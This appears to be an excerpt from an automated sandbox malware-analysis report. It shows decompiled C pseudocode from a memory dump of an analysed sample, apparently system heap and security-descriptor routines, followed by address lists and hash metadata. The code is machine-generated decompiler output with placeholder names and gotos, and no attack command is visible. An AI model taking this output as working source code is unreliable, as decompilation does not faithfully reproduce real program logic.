							_t432 = E3416A4D2(_t337, _t437, _t339, _t428, _t437, __eflags);
							L12:
							_t339 = _v112;
							L13:
							if(_t432 == 0) {
								_t433 = 0xc0000005;
								L148:
								 *( *[fs:0x18] + 0xbf4) = _t433;
								_t250 = L3419ABA0(_t433);
								__eflags = _v108 & 0x00000004;
								 *((intOrPtr*)( *[fs:0x18] + 0x34)) = _t250;
								if((_v108 & 0x00000004) != 0) {
									_v80 = _v124;
									_push( &_v100);
									_v100 = _t433;
									_v92 = 0;
									_v84 = 1;
									_v96 = 0;
									_v88 = L341C8A60;
									L341C8A60(_t339, _t386);
								}
								goto L150;
							}
							if( *((char*)(_t339 - 1)) == 5) {
								__eflags =  *(_t432 + 7);
								if(__eflags >= 0) {
									__eflags =  *(_t437 + 0x4c);
									if( *(_t437 + 0x4c) == 0) {
										L61:
										__eflags =  *(_t432 + 7);
										if( *(_t432 + 7) >= 0) {
											__eflags =  *(_t437 + 0x4c);
											if( *(_t437 + 0x4c) == 0) {
												_t254 =  *_t432 & 0x0000ffff;
											} else {
												_t323 =  *_t432;
												__eflags =  *(_t437 + 0x4c) & _t323;
												if(( *(_t437 + 0x4c) & _t323) != 0) {
													_t323 = _t323 ^  *(_t437 + 0x50);
													__eflags = _t323;
												}
												_t254 = _t323 & 0x0000ffff;
											}
										} else {
											_t421 = _t432 >> 0x00000003 ^  *_t432 ^ _t437 ^  *0x34266964;
											__eflags = _t421;
											if(_t421 == 0) {
												_t325 = _t432 - (_t421 >> 0xd);
												__eflags = _t325;
												_t326 =  *_t325;
											} else {
												_t326 = 0;
											}
											_t254 =  *((intOrPtr*)(_t326 + 0x14));
										}
										__eflags =  *(_t432 + 7) - 4;
										_t256 = _t254 & 0xffff;
										_v128 = _t256;
										if( *(_t432 + 7) != 4) {
											_t391 = _t256 * 8;
										} else {
											__eflags =  *(_t437 + 0x4c);
											if( *(_t437 + 0x4c) == 0) {
												_t320 =  *_t432 & 0x0000ffff;
											} else {
												_t322 =  *_t432;
												__eflags =  *(_t437 + 0x4c) & _t322;
												if(( *(_t437 + 0x4c) & _t322) != 0) {
													_t322 = _t322 ^  *(_t437 + 0x50);
													__eflags = _t322;
												}
												_t320 = _t322 & 0x0000ffff;
											}
											_t391 =  *((intOrPtr*)(_t432 - 8)) - (_t320 & 0x0000ffff) + _v128;
										}
										__eflags = _t391 + _t432 - _t339;
										if(_t391 + _t432 >= _t339) {
											L84:
											__eflags = _v108 & 0x3c000102;
											_v116 =  *(_t339 - 8);
											if((_v108 & 0x3c000102) != 0) {
												goto L15;
											}
											_t271 =  *((intOrPtr*)(_t339 - 1));
											__eflags = _t271 - 5;
											if(_t271 != 5) {
												__eflags = _t271 & 0x00000040;
												if((_t271 & 0x00000040) == 0) {
													_t396 = 0;
													__eflags = 0;
												} else {
													_t396 = (_t271 & 0x3f) << 0x00000003 & 0x0000ffff;
													_t271 =  *((intOrPtr*)(_t339 - 1));
												}
											} else {
												_t396 = ( *(_t339 - 2) & 0x000000ff) << 0x00000003 & 0x0000ffff;
												_t271 =  *((intOrPtr*)(_t339 - 1));
											}
											_t361 = _t396 & 0x0000ffff;
											_v120 = _t396;
											_v132 = _t361;
											_t339 = _t361 + _v124;
											_v128 = _t339;
											_t386 = _v112 - 8;
											__eflags = _t339 - _v124;
											if(_t339 < _v124) {
												L147:
												_t433 = 0xc0000017;
												goto L148;
											} else {
												_v124 = _t339;
												__eflags = _t271 - 5;
												if(_t271 != 5) {
													_t398 = 0;
													__eflags = 0;
												} else {
													_t398 = _t386 - (( *(_t386 + 6) & 0x000000ff) << 3) + 8;
												}
												_t339 = _v116;
												_t386 = _t437;
												_t272 = L342178DE(_v116, _t437, _v112, 5, _t398);
												__eflags = _t272;
												if(_t272 >= 0) {
													_t363 =  *(_t432 + 7);
													__eflags = _t363 - 4;
													if(_t363 != 4) {
														__eflags = _t363 - 5;
														if(_t363 != 5) {
															__eflags = _t363 & 0x00000040;
															if((_t363 & 0x00000040) == 0) {
																__eflags = (_t363 & 0x0000003f) - 0x3f;
																if((_t363 & 0x0000003f) == 0x3f) {
																	__eflags = _t363;
																	if(_t363 >= 0) {
																		__eflags =  *(_t437 + 0x4c);
																		if( *(_t437 + 0x4c) == 0) {
																			_t275 =  *_t432 & 0x0000ffff;
																		} else {
																			_t289 =  *_t432;
																			__eflags =  *(_t437 + 0x4c) & _t289;
																			if(( *(_t437 + 0x4c) & _t289) != 0) {
																				_t289 = _t289 ^  *(_t437 + 0x50);
																				__eflags = _t289;
																			}
																			_t275 = _t289 & 0x0000ffff;
																		}
																	} else {
																		_t370 = _t432 >> 0x00000003 ^  *_t432 ^ _t437 ^  *0x34266964;
																		__eflags = _t370;
																		if(_t370 == 0) {
																			_t291 = _t432 - (_t370 >> 0xd);
																			__eflags = _t291;
																			_t292 =  *_t291;
																		} else {
																			_t292 = 0;
																		}
																		_t275 =  *((intOrPtr*)(_t292 + 0x14));
																	}
																	_t364 =  *(_t432 + (_t275 & 0xffff) * 8 - 4);
																} else {
																	_t364 = _t363 & 0x3f;
																}
															} else {
																_t364 =  *(_t432 + 4 + (_t363 & 0x3f) * 8) & 0x0000ffff;
															}
														} else {
															_t364 =  *(_t437 + 0x54) & 0x0000ffff ^  *(_t432 + 4) & 0x0000ffff;
														}
														_t399 =  *(_t432 + 7);
														_v101 = _t399;
														__eflags = _t399;
														if(_t399 >= 0) {
															__eflags =  *(_t437 + 0x4c);
															if( *(_t437 + 0x4c) == 0) {
																_t278 =  *_t432 & 0x0000ffff;
															} else {
																_t285 =  *_t432;
																__eflags =  *(_t437 + 0x4c) & _t285;
																if(( *(_t437 + 0x4c) & _t285) != 0) {
																	_t285 = _t285 ^  *(_t437 + 0x50);
																	__eflags = _t285;
																}
																_t278 = _t285 & 0x0000ffff;
															}
														} else {
															_t407 = _t432 >> 0x00000003 ^  *_t432 ^ _t437 ^  *0x34266964;
															__eflags = _t407;
															if(_t407 == 0) {
																_t287 = _t432 - (_t407 >> 0xd);
																__eflags = _t287;
																_t288 =  *_t287;
															} else {
																_t288 = 0;
															}
															_t278 =  *((intOrPtr*)(_t288 + 0x14));
															_t399 = _v101;
														}
														_t365 = _t364 - _v132;
														_t279 = _t278 & 0x0000ffff;
														__eflags = _t365 - 0x3f;
														if(_t365 >= 0x3f) {
															 *(_t432 + (_t279 & 0x0000ffff) * 8 - 4) = _t365;
															_t284 = (_t399 >> 0x0000001f & 0x00000080) + 0x3f;
															__eflags = _t284;
															 *(_t432 + 7) = _t284;
														} else {
															 *(_t432 + 7) = _t399 >> 0x00000007 & 0x00000080 | _t365;
														}
													} else {
														_t374 = _v108;
														_t297 =  *(_t437 + 0x44) | _t374;
														__eflags = _t297 & 0x00000001;
														if((_t297 & 0x00000001) == 0) {
															E3417FED0( *((intOrPtr*)(_t437 + 0xc8)));
															_t374 = _v108;
														}
														__eflags =  *(_t437 + 0x4c);
														if( *(_t437 + 0x4c) != 0) {
															_t411 =  *(_t437 + 0x50) ^  *_t432;
															 *_t432 = _t411;
															_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
															__eflags = _t411 >> 0x18 - _t378;
															if(__eflags != 0) {
																_push(_t378);
																E3422D646(_t337, _t437, _t432, _t432, _t437, __eflags);
															}
															_t374 = _v108;
														}
														_t299 =  *_t432 - _v120;
														 *_t432 = _t299;
														__eflags =  *(_t437 + 0x4c);
														_t409 = _t299 & 0x0000ffff;
														if( *(_t437 + 0x4c) != 0) {
															 *(_t432 + 3) = _t409 >> 0x00000008 ^  *(_t432 + 2) ^ _t409;
															 *_t432 =  *_t432 ^  *(_t437 + 0x50);
															__eflags =  *_t432;
														}
														_t301 =  *(_t437 + 0x44) | _t374;
														__eflags = _t301 & 0x00000001;
														if((_t301 & 0x00000001) == 0) {
															_push( *((intOrPtr*)(_t437 + 0xc8)));
															E3417E740(_t374);
														}
													}
													_t188 = _t432 + 8; // 0xddeeddf6
													_t339 = _t188;
													_v112 = _t188;
													goto L15;
												} else {
													_t433 = 0xc0000005;
													goto L148;
												}
											}
										} else {
											L80:
											_v101 = 0;
											L81:
											_t386 = _t437;
											_t339 = 3;
											E34235FED(3, _t437, _t432, 3, 0, 0);
											__eflags = _v101;
											if(_v101 != 0) {
												_t339 = _v112;
												goto L84;
											}
											_t433 = 0xc000000d;
											goto L148;
										}
									}
									_t424 =  *(_t437 + 0x50) ^  *_t432;
									__eflags = _t424 >> 0x18 - (_t424 >> 0x00000010 ^ _t424 >> 0x00000008 ^ _t424);
									_t339 = _v112;
									if(_t424 >> 0x18 != (_t424 >> 0x00000010 ^ _t424 >> 0x00000008 ^ _t424)) {
										goto L80;
									}
									goto L61;
								}
								_t330 = E34231F59(_t337, _t437, _t432, _t432, _t437, __eflags);
								_t339 = _v112;
								_v101 = _t330;
								__eflags = _t330;
								if(_t330 != 0) {
									goto L61;
								}
								goto L81;
							}
							L15:
							_t386 = _v108 | 0x00000002;
							_t434 = L341828C0(_t437, _v108 | 0x00000002, _t339, _v124);
							_t260 =  *0x34266834; // 0x0
							if((_t260 & 0x00000001) != 0) {
								__eflags = _t260 & 0x00000002;
								if((_t260 & 0x00000002) == 0) {
									goto L16;
								}
								_t339 =  *[fs:0x30];
								__eflags =  *(_t339 + 0x18);
								if( *(_t339 + 0x18) == 0) {
									goto L16;
								}
								_push( *0x3426446c);
								_t268 = E34239682( *0x34264468);
								__eflags = _t437 -  *_t268;
								if(_t437 ==  *_t268) {
									goto L16;
								}
								__eflags = _t434;
								if(_t434 == 0) {
									L145:
									_v124 = _v124 - (_v120 & 0x0000ffff);
									__eflags = _v116;
									if(_v116 != 0) {
										_t435 = _v112;
										E3419B870(_t339, _t437, 0, _v112);
										_t264 = E3421D130(_t437, _v108, _v112, _t339, _v120, _v116);
										_t339 = _v116;
										_t386 = _t437;
										L342178DE(_v116, _t437, _t264, 6, _t435);
									}
									goto L147;
								}
								_t339 = _v108;
								__eflags = _t339 & 0x10000000;
								if((_t339 & 0x10000000) != 0) {
									L17:
									if(_t434 == 0) {
										goto L145;
									} else {
										_t386 = _v116;
										_t229 = _t434;
										if(_v116 != 0) {
											_t266 = E3421D130(_t437, _t339, _t434, _t339, _v120, _t386);
											_t386 = _t437;
											_v128 = _t266;
											L342178DE(_v116, _t437, _t266, 6, _t434);
											_t229 = _v128;
										}
										goto L19;
									}
								}
								L3422E8B1(_t437, _v112);
								_t386 = _t434;
								E3422DF93(_t437, _t434);
							}
							L16:
							_t339 = _v108;
							goto L17;
						}
						if((_t339 & 0x00000007) == 0) {
							__eflags =  *((char*)(_t339 - 1)) - 5;
							_t432 = _t339 - 8;
							if( *((char*)(_t339 - 1)) == 5) {
								_t432 = _t432 - (( *(_t432 + 6) & 0x000000ff) << 3);
								__eflags = _t432;
							}
							__eflags =  *(_t432 + 7) & 0x0000003f;
							if(( *(_t432 + 7) & 0x0000003f) != 0) {
								goto L13;
							} else {
								_push(0);
								_push(0);
								_push(0);
								_push(_t432);
								_t385 = 8;
								goto L11;
							}
						} else {
							_push(0);
							_push(0);
							_push(0);
							_push(_t339);
							_t385 = 9;
							L11:
							_t386 = _t437;
							E34235FED(_t385, _t437);
							_t432 = 0;
							goto L12;
						}
					}
					_t386 =  *(_t437 + 0xdc);
					_t334 =  *(_t437 + 0xdc);
					if(_t334 != 0) {
						L51:
						_t428 = _v124;
						__eflags = _v124 - _t334;
						if(__eflags <= 0) {
							goto L8;
						}
						_t335 =  *(_t437 + 0xe0);
						__eflags = _t335;
						if(_t335 != 0) {
							_t386 = _t437;
							_t339 = 0x14;
							E34235FED(0x14, _t437, 0, _t335, _t428, _t437);
						}
						goto L147;
					}
					_t334 =  *0x34264334; // 0x0
					if(_t334 != 0) {
						goto L51;
					}
					goto L8;
				}
			}

0x34182760
0x34182763
0x34182772
0x34182776
0x34182782
0x34182789
0x3418278b
0x3418278e
0x34182791
0x34182794
0x34182797
0x3418279a
0x341827a1
0x341827a9
0x341827ac
0x341827b1
0x341d61eb
0x341d61fa
0x341d67f4
0x341d67f4
0x3418287e
0x34182881
0x34182884
0x34182890
0x34182890
0x341827be
0x341d6209
0x341d620b
0x341d6211
0x341d6214
0x341d6216
0x341d6218
0x341d621f
0x341d6222
0x341d6224
0x341d6224
0x341d6227
0x341d6227
0x341d6222
0x341d622a
0x341d6231
0x341d6234
0x341d6236
0x341d623f
0x341d623f
0x341d6238
0x341d6238
0x341d623b
0x341d623b
0x341d6241
0x341d6244
0x341d6247
0x341d624a
0x341d624d
0x341d630a
0x341d630c
0x341d630f
0x341d6311
0x00000000
0x00000000
0x341d6317
0x341d631a
0x00000000
0x341d6320
0x341d6320
0x341d6327
0x341d632a
0x341d632c
0x341d6330
0x341d6333
0x341d6336
0x341d6338
0x341d6338
0x341d633a
0x341d633a
0x341d633d
0x341d6340
0x341d6342
0x341d6344
0x341d6344
0x00000000
0x341d6342
0x341d6253
0x341d6253
0x341d6253
0x341d6255
0x341d6264
0x341d6269
0x341d6269
0x341d6272
0x341d6275
0x341d6278
0x341d627e
0x341d6283
0x341d6287
0x341d628a
0x341d6292
0x341d6295
0x341d629b
0x341d62a1
0x341d62a2
0x341d62a9
0x341d62b0
0x341d62b7
0x341d62be
0x341d62c3
0x341d62c3
0x341d62c6
0x341d62c8
0x341d62cd
0x341d62cf
0x341d62d2
0x341d62d8
0x341d62da
0x341d62e4
0x341d62e9
0x341d62ee
0x341d62f3
0x341d62f3
0x341d62da
0x00000000
0x341d62d2
0x341d628c
0x341d6290
0x00000000
0x00000000
0x00000000
0x341d6290
0x341d624d
0x341827c6
0x341d634b
0x341d634b
0x341827ce
0x341d6358
0x341d6358
0x341827de
0x341827e1
0x341d6366
0x00000000
0x341827e7
0x341827ee
0x3418280d
0x34182811
0x341d639f
0x341d63a8
0x34182831
0x34182831
0x34182834
0x34182836
0x341d63af
0x341d67a4
0x341d67b2
0x341d67b8
0x341d67bd
0x341d67c1
0x341d67c4
0x341d67c9
0x341d67cf
0x341d67d0
0x341d67d3
0x341d67da
0x341d67e1
0x341d67e8
0x341d67ef
0x341d67ef
0x00000000
0x341d67c4
0x34182840
0x341d63b9
0x341d63bd
0x341d63d7
0x341d63db
0x341d6400
0x341d6400
0x341d6404
0x341d642d
0x341d6431
0x341d6442
0x341d6433
0x341d6433
0x341d6435
0x341d6438
0x341d643a
0x341d643a
0x341d643a
0x341d643d
0x341d643d
0x341d6406
0x341d640f
0x341d6415
0x341d6418
0x341d6423
0x341d6423
0x341d6425
0x341d641a
0x341d641a
0x341d641a
0x341d6427
0x341d6427
0x341d6445
0x341d644c
0x341d644f
0x341d6452
0x341d6479
0x341d6454
0x341d6454
0x341d6458
0x341d6469
0x341d645a
0x341d645a
0x341d645c
0x341d645f
0x341d6461
0x341d6461
0x341d6461
0x341d6464
0x341d6464
0x341d6474
0x341d6474
0x341d6483
0x341d6485
0x341d64b0
0x341d64b0
0x341d64ba
0x341d64bd
0x00000000
0x00000000
0x341d64c3
0x341d64c6
0x341d64c8
0x341d64da
0x341d64dc
0x341d64ef
0x341d64ef
0x341d64de
0x341d64e7
0x341d64ea
0x341d64ea
0x341d64ca
0x341d64d2
0x341d64d5
0x341d64d5
0x341d64f1
0x341d64f4
0x341d64fa
0x341d64fd
0x341d6500
0x341d6503
0x341d6506
0x341d6509
0x341d679f
0x341d679f
0x00000000
0x341d650f
0x341d650f
0x341d6512
0x341d6514
0x341d6524
0x341d6524
0x341d6516
0x341d651f
0x341d651f
0x341d652d
0x341d6530
0x341d6532
0x341d6537
0x341d6539
0x341d6545
0x341d6548
0x341d654b
0x341d65dc
0x341d65df
0x341d65ed
0x341d65f0
0x341d6603
0x341d6605
0x341d660f
0x341d6611
0x341d663a
0x341d663e
0x341d664f
0x341d6640
0x341d6640
0x341d6642
0x341d6645
0x341d6647
0x341d6647
0x341d6647
0x341d664a
0x341d664a
0x341d6613
0x341d661c
0x341d6622
0x341d6625
0x341d6630
0x341d6630
0x341d6632
0x341d6627
0x341d6627
0x341d6627
0x341d6634
0x341d6634
0x341d6658
0x341d6607
0x341d660a
0x341d660a
0x341d65f2
0x341d65f8
0x341d65f8
0x341d65e1
0x341d65e9
0x341d65e9
0x341d665c
0x341d665f
0x341d6662
0x341d6664
0x341d6690
0x341d6694
0x341d66a5
0x341d6696
0x341d6696
0x341d6698
0x341d669b
0x341d669d
0x341d669d
0x341d669d
0x341d66a0
0x341d66a0
0x341d6666
0x341d666f
0x341d6675
0x341d6678
0x341d6683
0x341d6683
0x341d6685
0x341d667a
0x341d667a
0x341d667a
0x341d6687
0x341d668b
0x341d668b
0x341d66a8
0x341d66ab
0x341d66ae
0x341d66b1
0x341d66c3
0x341d66cf
0x341d66cf
0x341d66d1
0x341d66b3
0x341d66bb
0x341d66bb
0x341d6551
0x341d6554
0x341d6557
0x341d6559
0x341d655b
0x341d6563
0x341d6568
0x341d6568
0x341d656b
0x341d656f
0x341d6574
0x341d6578
0x341d6584
0x341d6589
0x341d658b
0x341d658d
0x341d6592
0x341d6592
0x341d6597
0x341d6597
0x341d659d
0x341d65a1
0x341d65a4
0x341d65a8
0x341d65ab
0x341d65b7
0x341d65bd
0x341d65bd
0x341d65bd
0x341d65c2
0x341d65c4
0x341d65c6
0x341d65cc
0x341d65d2
0x341d65d2
0x341d65c6
0x341d66d4
0x341d66d4
0x341d66d7
0x00000000
0x341d653b
0x341d653b
0x00000000
0x341d653b
0x341d6539
0x341d6487
0x341d6487
0x341d6487
0x341d648b
0x341d6491
0x341d6493
0x341d6498
0x341d649d
0x341d64a1
0x341d64ad
0x00000000
0x341d64ad
0x341d64a3
0x00000000
0x341d64a3
0x341d6485
0x341d63e2
0x341d63f5
0x341d63f7
0x341d63fa
0x00000000
0x00000000
0x00000000
0x341d63fa
0x341d63c3
0x341d63c8
0x341d63cb
0x341d63ce
0x341d63d0
0x00000000
0x00000000
0x00000000
0x341d63d2
0x34182846
0x3418284d
0x34182857
0x34182859
0x34182860
0x341d66df
0x341d66e1
0x00000000
0x00000000
0x341d66e7
0x341d66ee
0x341d66f2
0x00000000
0x00000000
0x341d66f8
0x341d6704
0x341d6709
0x341d670b
0x00000000
0x00000000
0x341d6711
0x341d6713
0x341d6764
0x341d676a
0x341d676d
0x341d6771
0x341d6773
0x341d677a
0x341d678c
0x341d6791
0x341d6794
0x341d679a
0x341d679a
0x00000000
0x341d6771
0x341d6715
0x341d6718
0x341d671e
0x34182869
0x3418286b
0x00000000
0x34182871
0x34182871
0x34182874
0x34182878
0x341d6746
0x341d674e
0x341d6754
0x341d6757
0x341d675c
0x341d675c
0x00000000
0x34182878
0x3418286b
0x341d6729
0x341d672e
0x341d6732
0x341d6732
0x34182866
0x34182866
0x00000000
0x34182866
0x3418281a
0x34182893
0x34182897
0x3418289a
0x341828a3
0x341828a3
0x341828a3
0x341828a5
0x341828a9
0x00000000
0x341828ab
0x341828ab
0x341828ad
0x341828af
0x341828b1
0x341828b2
0x00000000
0x341828b2
0x3418281c
0x3418281c
0x3418281e
0x34182820
0x34182822
0x34182823
0x34182828
0x34182828
0x3418282a
0x3418282f
0x00000000
0x3418282f
0x3418281a
0x341827f0
0x341827f6
0x341827fa
0x341d6370
0x341d6370
0x341d6373
0x341d6375
0x00000000
0x00000000
0x341d637b
0x341d6381
0x341d6383
0x341d638e
0x341d6390
0x341d6395
0x341d6395
0x00000000
0x341d6383
0x34182800
0x34182807
0x00000000
0x00000000
0x00000000
0x34182807

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ac343305c82e87632ac8e3a8c0a28e57cf804f4af058eca5a86242d369798e6
Instruction ID: c415facb64eb46caa118b101039cc15520264669503aa7215a8b668e44982c40
Opcode Fuzzy Hash: 7ac343305c82e87632ac8e3a8c0a28e57cf804f4af058eca5a86242d369798e6
Instruction Fuzzy Hash: BD32F0B4A10B58CFEB14DF69C8947BEBBF2AF86344F20415DD449AB294DB35A842CF50

Uniqueness

Uniqueness Score: -1.00%

Function 342084BB Relevance: .4, Instructions: 386
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E342084BB(void* __ebx, signed int __ecx, void* __edx, void* __eflags, signed int* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v5;
				char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed char _v40;
				signed int _v44;
				signed int _v48;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t152;
				signed int _t157;
				signed int _t158;
				intOrPtr _t167;
				signed char _t186;
				signed char _t196;
				signed int _t198;
				signed int _t199;
				signed char _t203;
				signed int _t218;
				signed int _t219;
				signed int _t221;
				signed int _t222;
				intOrPtr _t223;
				signed int _t226;
				signed int _t230;
				signed int _t233;
				signed int _t236;
				signed int _t237;
				intOrPtr _t238;
				signed int _t240;
				signed int _t242;
				signed char _t244;
				signed int _t245;
				signed int _t248;
				signed int _t255;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t264;
				signed int _t265;
				signed int _t268;
				signed char _t270;
				void* _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				signed int _t282;
				signed int _t286;
				signed int _t287;
				void* _t295;
				signed int _t296;
				void* _t297;
				void* _t298;
				signed int _t299;
				signed int _t301;
				void* _t302;

				_v12 = __ecx;
				_v24 = 0;
				_v6 = 0;
				_v16 = 0;
				_v5 = 0;
				_v28 = 0;
				_t295 = __edx;
				_push(__edx);
				_v36 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				if(E341A81A0(__ebx, _t275, __edx, __eflags) != 0) {
					_t233 =  *(__edx + 4);
					_t258 = _t233;
					_push(__ebx);
					_t218 =  *(__edx + 2) & 0x0000ffff;
					_t276 = _t218;
					_v32 = _t276;
					__eflags = _t276;
					if(_t276 >= 0) {
						_v48 = _t233;
					} else {
						asm("sbb edx, edx");
						_t258 =  ~_t258 & _t233 + __edx;
						_v48 = _t258;
					}
					__eflags = _t258;
					if(_t258 != 0) {
						_t259 =  *(_t295 + 8);
						__eflags = _t276;
						if(_t276 >= 0) {
							_v20 = _t259;
						} else {
							asm("sbb edi, edi");
							_v20 =  ~_t259 & _t259 + _t295;
							_t276 = _v32;
						}
						__eflags = _t218 & 0x00000010;
						if((_t218 & 0x00000010) == 0) {
							L30:
							_t277 = _v12;
							_t236 = _t218 & 0x00002010 | 0x00000800;
							_v32 = _t236;
							__eflags = _t277;
							if(_t277 == 0) {
								_t260 = 0;
								__eflags = 0;
								L35:
								__eflags = _t260;
								if(_t260 != 0) {
									_t248 = _t236 | 0x00002000;
									__eflags = _t248;
									_v32 = _t248;
								}
								L37:
								_t219 = _t218 & 0x0000ffff;
								goto L38;
							}
							_t196 =  *(_t277 + 2) & 0x0000ffff;
							_t270 = _t196;
							__eflags = _t196 & 0x00000010;
							if((_t196 & 0x00000010) == 0) {
								goto L37;
							}
							__eflags = _t270;
							_t260 =  *(_t277 + 0xc);
							if(_t270 < 0) {
								asm("sbb edx, edx");
								_t260 =  ~_t260 & _t260 + _t277;
							}
							goto L35;
						} else {
							_t230 =  *(_t295 + 0xc);
							__eflags = _t276;
							if(_t276 >= 0) {
								_t198 = _t230;
								_v40 = _t198;
							} else {
								asm("sbb edi, edi");
								_v40 =  ~_t230 & _t230 + _t295;
								_t276 = _v32;
								_t198 = _v40;
							}
							__eflags = _t198;
							if(_t198 == 0) {
								_t218 =  *(_t295 + 2) & 0x0000ffff;
								goto L30;
							} else {
								_t199 =  *(_t295 + 2) & 0x0000ffff;
								__eflags = _t199 & 0x00002800;
								if((_t199 & 0x00002800) != 0) {
									L28:
									_v32 = _t199 & 0x00002010 | 0x00000800;
									_v24 = _v40;
									L27:
									_t219 =  *(_t295 + 2) & 0x0000ffff;
									_t277 = _v12;
									L38:
									_t152 = _t219 & 0x0000ffff;
									_v40 = _t152;
									__eflags = _t219 & 0x00000004;
									if((_t219 & 0x00000004) == 0) {
										L56:
										_t221 = _t219 & 0x00000004 | 0x00001400;
										__eflags = _t221;
										L57:
										_t237 = _v16;
										L58:
										_v12 = 0x0000000b + ( *(_v48 + 1) & 0x000000ff) * 0x00000004 & 0xfffffffc;
										_t157 = _v20;
										__eflags = _t157;
										if(_t157 == 0) {
											_t296 = 0;
											__eflags = 0;
										} else {
											_t296 = 0x0000000b + ( *(_t157 + 1) & 0x000000ff) * 0x00000004 & 0xfffffffc;
										}
										_t158 = _v24;
										__eflags = _t158;
										if(_t158 == 0) {
											_t261 = 0;
											__eflags = 0;
										} else {
											_t261 = ( *(_t158 + 2) & 0x0000ffff) + 0x00000003 & 0xfffffffc;
										}
										_v40 = _t261;
										__eflags = _t237;
										if(_t237 == 0) {
											_t278 = 0;
											__eflags = 0;
										} else {
											_t278 = ( *(_t237 + 2) & 0x0000ffff) + 0x00000003 & 0xfffffffc;
										}
										_t238 =  *0x34265d78; // 0x0
										_t240 = E34185D90(_t238 + 0x140000, _v36, _t238 + 0x140000, _t278 + _t261 + _t296 + _v12 + 0x14);
										_v28 = _t240;
										__eflags = _t240;
										if(_t240 != 0) {
											E341992F5(_t162, _t240);
											_t297 = _t240 + 0x14;
											 *(_t240 + 2) =  *(_t240 + 2) | _v32 | 0x00008000;
											_t264 = _v24;
											__eflags = _t264;
											if(_t264 == 0) {
												__eflags = 0;
											} else {
												L341B88C0(_t297, _t264,  *(_t264 + 2) & 0x0000ffff);
												_t240 = _v28;
												_t302 = _t302 + 0xc;
												_t297 = _t297 + _v40;
												_push(0x14);
												_pop(0);
											}
											 *((intOrPtr*)(_t240 + 0xc)) = 0;
											 *(_t240 + 2) =  *(_t240 + 2) | _t221;
											_t265 = _v16;
											__eflags = _t265;
											if(_t265 == 0) {
												_t167 = 0;
												__eflags = 0;
											} else {
												L341B88C0(_t297, _t265,  *(_t265 + 2) & 0x0000ffff);
												_t240 = _v28;
												_t302 = _t302 + 0xc;
												_t167 = _t297 - _t240;
												_t297 = _t297 + _t278;
											}
											 *((intOrPtr*)(_t240 + 0x10)) = _t167;
											L341B88C0(_t297, _v48, 8 + ( *(_v48 + 1) & 0x000000ff) * 4);
											_t222 = _v28;
											_t298 = _t297 + _v12;
											_t242 = _v20;
											 *((intOrPtr*)(_t222 + 4)) = _t297 - _t222;
											__eflags = _t242;
											if(_t242 != 0) {
												L341B88C0(_t298, _t242, 8 + ( *(_t242 + 1) & 0x000000ff) * 4);
												_t299 = _t298 - _t222;
												__eflags = _t299;
												 *(_t222 + 8) = _t299;
											}
											_t279 = 0;
											__eflags = 0;
										} else {
											_t279 = 0xc0000017;
										}
										__eflags = _v5;
										_t223 = _v36;
										if(_v5 != 0) {
											L34183BC0(_t223, 0, _v16);
										}
										L81:
										__eflags = _v6;
										if(_v6 != 0) {
											L34183BC0(_t223, 0, _v24);
										}
										goto L83;
									}
									_t268 =  *(_t295 + 0x10);
									_t237 = _t268;
									__eflags = _t152;
									if(_t152 < 0) {
										asm("sbb ecx, ecx");
										_t237 =  ~_t237 & _t268 + _t295;
										__eflags = _t237;
										_t152 = _v40;
									}
									__eflags = _t237;
									if(_t237 == 0) {
										goto L56;
									} else {
										__eflags = _t219 & 0x00001400;
										if((_t219 & 0x00001400) != 0) {
											L55:
											_v16 = _t237;
											_t221 = _t219 & 0x00001004 | 0x00000400;
											goto L58;
										}
										__eflags = _t277;
										if(_t277 == 0) {
											goto L55;
										}
										_t226 =  *(_t295 + 8);
										__eflags = _t152;
										if(_t152 < 0) {
											asm("sbb ebx, ebx");
											__eflags = _t226;
											_t152 = _v40;
										}
										_t282 =  *(_t295 + 4);
										__eflags = _t152;
										if(_t152 < 0) {
											asm("sbb edi, edi");
											_t282 =  ~_t282 & _t282 + _t295;
											__eflags = _v40;
											if(_v40 < 0) {
												asm("sbb edx, edx");
												__eflags = _t268;
											}
										}
										_t301 = _v12;
										_t186 =  *(_t301 + 2) & 0x0000ffff;
										_t244 = _t186;
										__eflags = _t186 & 0x00000004;
										if((_t186 & 0x00000004) != 0) {
											__eflags = _t244;
											_t245 =  *(_t301 + 0x10);
											if(_t244 < 0) {
												asm("sbb ecx, ecx");
												__eflags = _t245;
											}
										} else {
											_t245 = 0;
										}
										_t279 = E34207CE8(_t245, _t268, _a8, _a12, _t282, _t226, _a16,  &_v16,  &_v44);
										__eflags = _t279;
										if(_t279 < 0) {
											_t223 = _v36;
											goto L81;
										} else {
											_v5 = 1;
											_t221 = _v44 & 0x00001408 | 0x00000004;
											goto L57;
										}
									}
								}
								__eflags = _v12;
								if(_v12 == 0) {
									goto L28;
								}
								__eflags = _t276;
								if(_t276 < 0) {
									asm("sbb edx, edx");
									_t259 =  ~_t259 & _t259 + _t295;
									__eflags = _t276;
									if(_t276 < 0) {
										asm("sbb ecx, ecx");
										_t233 =  ~_t233 & _t233 + _t295;
										__eflags = _t276;
										if(_t276 < 0) {
											asm("sbb ebx, ebx");
											__eflags = _t230;
										}
									}
								}
								_t203 =  *(_v12 + 2) & 0x0000ffff;
								_v40 = _t203;
								_t286 = _v12;
								__eflags = _t203 & 0x00000010;
								if((_t203 & 0x00000010) != 0) {
									__eflags = _v40;
									_t287 =  *(_t286 + 0xc);
									if(_v40 < 0) {
										asm("sbb edi, edi");
										__eflags = _t287;
									}
								} else {
									_t287 = 0;
								}
